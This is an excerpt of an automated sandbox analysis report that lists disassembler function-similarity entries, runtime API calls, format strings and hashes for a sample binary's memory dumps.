                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: fwrite$free
                                            • String ID: %s%s$Wildcard - "%s" skipped by user$Wildcard - START of "%s"
                                            • API String ID: 3468156532-1133524294
                                            • Opcode ID: 8299427a5ad266f79722ea9ef5ffcf9a9fc35c8886571f6f63a6ff16aa18c0a4
                                            • Instruction ID: 20e8cce585148c8f701a6a9eedd19cb778d20f9c4bdea9201495aacf4cf8c51b
                                            • Opcode Fuzzy Hash: 8299427a5ad266f79722ea9ef5ffcf9a9fc35c8886571f6f63a6ff16aa18c0a4
                                            • Instruction Fuzzy Hash: C9418276B09A8AC0E710EF55E4A5BADABA0EF44F84F854037DE0E9B345DE39D4418362
                                            APIs
                                            • memcpy.VCRUNTIME140(?,0000006E00000006,?,FFFFFFFF,00007FF7E59E11FA), ref: 00007FF7E59F05B8
                                            • memcpy.VCRUNTIME140(?,0000006E00000006,?,FFFFFFFF,00007FF7E59E11FA), ref: 00007FF7E59F0659
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E59F0677
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: memcpy$Concurrency::cancel_current_task
                                            • String ID:
                                            • API String ID: 326894585-0
                                            • Opcode ID: de1c6875f200540c7d25ef907db20005fdec5c9f83ccc6c164fa8115f0418b6c
                                            • Instruction ID: 1a21c8d92a00bc75b568169316448830772680f842c6cccaa157306d6b372503
                                            • Opcode Fuzzy Hash: de1c6875f200540c7d25ef907db20005fdec5c9f83ccc6c164fa8115f0418b6c
                                            • Instruction Fuzzy Hash: 5921EA62B0A74E44E915BB52A5103B896889F44FE4F940732DE6E477C1DF7CA4A18322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: %s: %s$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$GMT
                                            • API String ID: 1294909896-1153420294
                                            • Opcode ID: 5bf4d807dab3c4c4c80c6444e0c9514796da9ea9dd13b643f44312d4cc7cdbe3
                                            • Instruction ID: 4be6f3baf9248c447752200729a62fca29f0d3bdde2be40a971a9d686e423fae
                                            • Opcode Fuzzy Hash: 5bf4d807dab3c4c4c80c6444e0c9514796da9ea9dd13b643f44312d4cc7cdbe3
                                            • Instruction Fuzzy Hash: 8F31C121B09B8A89E760AB50E464BADAB91FF45F88FD50033CB4D93241CF7CE549C322
                                            APIs
                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A00292
                                            • memcpy.VCRUNTIME140 ref: 00007FF7E5A002CD
                                              • Part of subcall function 00007FF7E59F5620: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E59F5635
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A00302
                                              • Part of subcall function 00007FF7E59F5730: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E59FFD30,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E59F1B61), ref: 00007FF7E59F5757
                                              • Part of subcall function 00007FF7E59F5730: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E59FFD30,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E59F1B61), ref: 00007FF7E59F5763
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$malloc$memcpy
                                            • String ID: %s:
                                            • API String ID: 901724546-64597662
                                            • Opcode ID: 1b73f9cfeb138da4e2e179966cb669f2fdf5ab84fc2fa84ad0d24e29dda246a4
                                            • Instruction ID: 4bd263771c0227c617732e6a15dc6da5d9cad55d8dfee9b80b5ed06576a40583
                                            • Opcode Fuzzy Hash: 1b73f9cfeb138da4e2e179966cb669f2fdf5ab84fc2fa84ad0d24e29dda246a4
                                            • Instruction Fuzzy Hash: E421B422B08A8981DB00DF12E950AAABBA4FF54FE8FC80132DE5D47795DF38D5458351
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemallocmemcpy
                                            • String ID: TRUE
                                            • API String ID: 3056473165-3412697401
                                            • Opcode ID: 1937b63237afc5f6f21e48b4429b9b86981b2e9b08ff3c4b24e74200198c31d2
                                            • Instruction ID: e75d6496a15d0fb3f5f4baf643fc3440eed82acc617dc44f93ebf27ce3b99ecb
                                            • Opcode Fuzzy Hash: 1937b63237afc5f6f21e48b4429b9b86981b2e9b08ff3c4b24e74200198c31d2
                                            • Instruction Fuzzy Hash: E221F465B0974A48FF269E16A520778AB52AF44FE8F944533CD1E837C4DE7CE0858322
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: isupper$_strdupfree
                                            • String ID:
                                            • API String ID: 3359907120-0
                                            • Opcode ID: 733391f2657efa35da2d8d8438dedb358714d88d68be73f8003184230d9818b7
                                            • Instruction ID: c35f1a678c3cbaeece350ef88e22d780fc9a8676d7c9d168150a590c52c20ffe
                                            • Opcode Fuzzy Hash: 733391f2657efa35da2d8d8438dedb358714d88d68be73f8003184230d9818b7
                                            • Instruction Fuzzy Hash: DD219A61F0D59A8DFB22EF249464B7CEF918F15F48F980532C68AC1AA5EE3C9545C332
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemallocmemcpy
                                            • String ID: %s: %s
                                            • API String ID: 3056473165-1451338302
                                            • Opcode ID: 6fde202d0c3394d4d3b152cbdee7f1931a83e8931206ff3ebd1cffdcec02409d
                                            • Instruction ID: 981a08a6c985de64fae65d59c34aa8ff409a1c1feffed7a262b2829a1b203eb9
                                            • Opcode Fuzzy Hash: 6fde202d0c3394d4d3b152cbdee7f1931a83e8931206ff3ebd1cffdcec02409d
                                            • Instruction Fuzzy Hash: 00210410B0C78645EA74AB16A424BB9DB91BF85FE4F844133CE1E47B85DE3CE0458312
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: Start Date: %s$%s%lx$Start Date
                                            • API String ID: 1294909896-3519493645
                                            • Opcode ID: a1b6b3256ead3aeb3d1a1e51bff87909139f67e609f50f31950d91eaa5aa90a4
                                            • Instruction ID: 00b5c0a7b19c5caa28ae1d24dde8a1185c46472a723e4af630847cd348fca82a
                                            • Opcode Fuzzy Hash: a1b6b3256ead3aeb3d1a1e51bff87909139f67e609f50f31950d91eaa5aa90a4
                                            • Instruction Fuzzy Hash: 7221A951B0D2DA45EE14A7259464BFDEF92AF05F88FC45833CA0E8B642DE3DA1448363
                                            APIs
                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FF7E5A08FA8), ref: 00007FF7E5A090F5
                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FF7E5A08FA8), ref: 00007FF7E5A0910F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strncmp
                                            • String ID: I32$I64
                                            • API String ID: 1114863663-3980630743
                                            • Opcode ID: 43a352a892712fe73208679e218960c350d0e5422f0842123306e9b92ba5ab5c
                                            • Instruction ID: cca326750d4bae13c9f03f551653327dd17eac6624f55b1698bc87f71625b8cc
                                            • Opcode Fuzzy Hash: 43a352a892712fe73208679e218960c350d0e5422f0842123306e9b92ba5ab5c
                                            • Instruction Fuzzy Hash: 8A21C232B1D55A4AE7246B31D470BB9BE94AF09F4CF899136CB49832C4DE3CE504CB62
                                            APIs
                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A33E99,00000000,?,?,00007FF7E5A33456), ref: 00007FF7E5A33159
                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A33E99,00000000,?,?,00007FF7E5A33456), ref: 00007FF7E5A33190
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A33E99,00000000,?,?,00007FF7E5A33456), ref: 00007FF7E5A331A2
                                            • memcpy.VCRUNTIME140(?,?,?,00007FF7E5A33E99,00000000,?,?,00007FF7E5A33456), ref: 00007FF7E5A331CA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemallocmemcpyrealloc
                                            • String ID:
                                            • API String ID: 3881842442-0
                                            • Opcode ID: cea1445d491202ccc5f1bb3fde8ba13241085fcd7cbefc25c7e8a0734b400696
                                            • Instruction ID: b034d7a228087bb0b6781ea5d8d91e904769c7947f80c142a79fca7c12a8d711
                                            • Opcode Fuzzy Hash: cea1445d491202ccc5f1bb3fde8ba13241085fcd7cbefc25c7e8a0734b400696
                                            • Instruction Fuzzy Hash: 34216D26709B8582DB44CF16F46062DA7A0FB48FC8F888432DE5E47758EF38D491C311
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strstr$calloc
                                            • String ID: ;type=
                                            • API String ID: 3224321581-3507045495
                                            • Opcode ID: 0222ecf549d9eab6eeb32d814db4a0ad4109cacb1d6406b327078b4eadc27f5b
                                            • Instruction ID: 304144ba544c51092effcbe97f680e2e7f41159f26c9491c4d32908fc2151edd
                                            • Opcode Fuzzy Hash: 0222ecf549d9eab6eeb32d814db4a0ad4109cacb1d6406b327078b4eadc27f5b
                                            • Instruction Fuzzy Hash: 5F21C73170868681EB159B24F0607A8BBA1FF48F84F888136DB9E877C5DF7CE4918321
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$freemalloc
                                            • String ID:
                                            • API String ID: 2605342592-0
                                            • Opcode ID: 72fc4d6c210c94181f49e1ff445ae12eb0e65c64eb716051aca1f70ff3a1cb6a
                                            • Instruction ID: bac887ee905818ff2792ef3f781718fcf9ad7ddead412af9da62ba568a89b6c4
                                            • Opcode Fuzzy Hash: 72fc4d6c210c94181f49e1ff445ae12eb0e65c64eb716051aca1f70ff3a1cb6a
                                            • Instruction Fuzzy Hash: 2D115131B09B45C6E7109F52B91062DBBA0FF88FC0B984039DB4A87B14DF78D9018751
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupfree$strchr
                                            • String ID:
                                            • API String ID: 1739957132-0
                                            • Opcode ID: 7cab5db05de9ca3a6ba704ce4dbf99f699dd45310a38cd1de36bc81fa6730da7
                                            • Instruction ID: bbae68499199df0d4a27416bb637103d4cecd62c406fbeba556a7d45b33f25e9
                                            • Opcode Fuzzy Hash: 7cab5db05de9ca3a6ba704ce4dbf99f699dd45310a38cd1de36bc81fa6730da7
                                            • Instruction Fuzzy Hash: 5E017951F0D74682FF55AB157965A3C96906F44FD8F880036ED4E87744DE3CD4858612
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$CriticalDeleteSectionclosesocket
                                            • String ID:
                                            • API String ID: 3086658127-0
                                            • Opcode ID: 7574a7043eeb4c3d10f9198af3bfb012d035b464662d470d139b8739ea4c5b1f
                                            • Instruction ID: 9cb5f65ebeaa486a3af0b7db4d87e95cf7d13e456d010132a1c42975aa654eca
                                            • Opcode Fuzzy Hash: 7574a7043eeb4c3d10f9198af3bfb012d035b464662d470d139b8739ea4c5b1f
                                            • Instruction Fuzzy Hash: 97015212E18B8683EB04DF71D9302786320FFE9F18B556322DD6E411A59F78A5E48211
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strncmp
                                            • String ID: I32$I64
                                            • API String ID: 1114863663-3980630743
                                            • Opcode ID: 99a124b7da873222bd242a2a80f7ee9b642aaf26a40535330719751bb5e961a6
                                            • Instruction ID: 66f268ee6806116596ed4ab3a122104472b039bc790fbf34530d3835d4d6c94b
                                            • Opcode Fuzzy Hash: 99a124b7da873222bd242a2a80f7ee9b642aaf26a40535330719751bb5e961a6
                                            • Instruction Fuzzy Hash: 98F0542172D54645E6206B61D874B75AE94AF09F88F855137C90DC2294DE3CE204C722
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strncmp
                                            • String ID: I32$I64
                                            • API String ID: 1114863663-3980630743
                                            • Opcode ID: a47212c89471e80574d32abf2d57b142d35ca8e7c22bef0864889be9cf398db5
                                            • Instruction ID: 5cc239cd0bd0dce30b6f075ea0e1f303c8141071b53d5b386d5b2c31bcf5e2cb
                                            • Opcode Fuzzy Hash: a47212c89471e80574d32abf2d57b142d35ca8e7c22bef0864889be9cf398db5
                                            • Instruction Fuzzy Hash: BCF0542172954645E7206B61D874B76AE94AF09F88F855137C91DC2294DE3CE204C722
                                            APIs
                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7E5A06576), ref: 00007FF7E5A311D4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _errno
                                            • String ID: %lx
                                            • API String ID: 2918714741-1448181948
                                            • Opcode ID: c18ae29bb276a8ad680b31d530baec24a6480b71590a79a41d77ef7598f730cd
                                            • Instruction ID: 36e69dd4f1b3b0e62bc8d996558c8098afc095795c1516b6d93c2cbf2271364f
                                            • Opcode Fuzzy Hash: c18ae29bb276a8ad680b31d530baec24a6480b71590a79a41d77ef7598f730cd
                                            • Instruction Fuzzy Hash: 0B817A62B1C1D985E7689A259460B7DFED0EF85B88F584237E79EC22C1DE3CC4418722
                                            APIs
                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_,?,00000000,00007FF7E5A1C8C3), ref: 00007FF7E5A1CFB2
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_,?,00000000,00007FF7E5A1C8C3), ref: 00007FF7E5A1D003
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupmalloc
                                            • String ID: (){ %*]
                                            • API String ID: 3515966317-731572209
                                            • Opcode ID: 828cb0b03bfd1f9835d7e49c80cb9220c802b63348bb1293add8a6644de1a829
                                            • Instruction ID: ee882ad8ba4f906950f6fe16bbb1c8e1a1642ca2c9f8c75ff11cbd58b27da90c
                                            • Opcode Fuzzy Hash: 828cb0b03bfd1f9835d7e49c80cb9220c802b63348bb1293add8a6644de1a829
                                            • Instruction Fuzzy Hash: E9310751B0D7AE54FE216A245270B79AF819F56F94FD84136DA8F832C1CE3DA905C232
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupfree
                                            • String ID: %ld
                                            • API String ID: 1865132094-1112595699
                                            • Opcode ID: ac70dd28215ecf0eaff7103c99b32800d312326dd7842514aad38126b35053d6
                                            • Instruction ID: 2139937c16cf4a8021ad5f621a2fc828eb6ece46f0c6216ad42fbb38efeeef7a
                                            • Opcode Fuzzy Hash: ac70dd28215ecf0eaff7103c99b32800d312326dd7842514aad38126b35053d6
                                            • Instruction Fuzzy Hash: 6831A826B09A4A81FB65EB50D171B79AF90AF44F54F850037DE8D93A85EF3CE484C722
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
